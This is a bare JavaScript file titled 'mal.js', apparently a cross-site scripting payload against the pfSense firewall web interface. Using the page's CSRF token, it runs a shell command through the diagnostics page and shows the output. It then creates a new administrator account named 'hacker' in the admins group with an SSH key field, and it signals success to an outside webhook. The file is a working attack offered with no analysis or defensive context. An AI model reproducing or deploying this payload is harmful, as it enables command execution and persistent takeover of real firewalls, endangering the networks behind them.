mal.js

fetch("webhook_url", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ content: "pfSense script executed!" })
})

var formData = new FormData();formData.append("__csrf_magic", csrfMagicToken);formData.append("txtCommand", "cat /HACKED_FILE.txt");formData.append("txtRecallBuffer", "id");formData.append("submit", "EXEC");formData.append("dlPath", "");formData.append("ulfile", new Blob(), "");formData.append("txtPHPCommand", "");fetch("/diag_command.php", {method: "POST",body: formData}).then(response => response.text()).then(data => {const parser = new DOMParser();const doc = parser.parseFromString(data, "text/html");const contentDiv = doc.querySelector("div.content");if (contentDiv) {alert(contentDiv.textContent);} else {alert("No content found");}})
var formData2 = new FormData();formData2.append("__csrf_magic", csrfMagicToken);formData2.append("usernamefld", "hacker");formData2.append("passwordfld1", "hacker");formData2.append("passwordfld2", "hacker");formData2.append("descr", "hacker");formData2.append("expires", "");formData2.append("webguicss", "pfSense.css");formData2.append("webguifixedmenu", "");formData2.append("webguihostnamemenu", "");formData2.append("dashboardcolumns", 2);formData2.append("groups[]", "admins");formData2.append("authorizedkeys", "pub key");formData2.append("ipsecpsk", "");formData2.append("act", "");formData2.append("userid", "");formData2.append("privid", "");formData2.append("certid", "");formData2.append("utype", "user");formData2.append("oldusername", "");formData2.append("save", "Save");fetch("/system_usermanager.php?act=new", {method: "POST",body: formData2,redirect: "manual",headers: {"Accept": "text/html"}}).then(response => response.text()).then(data => {console.log("Response received:");console.log(data);}).catch(error => {console.error("Error occurred:", error);});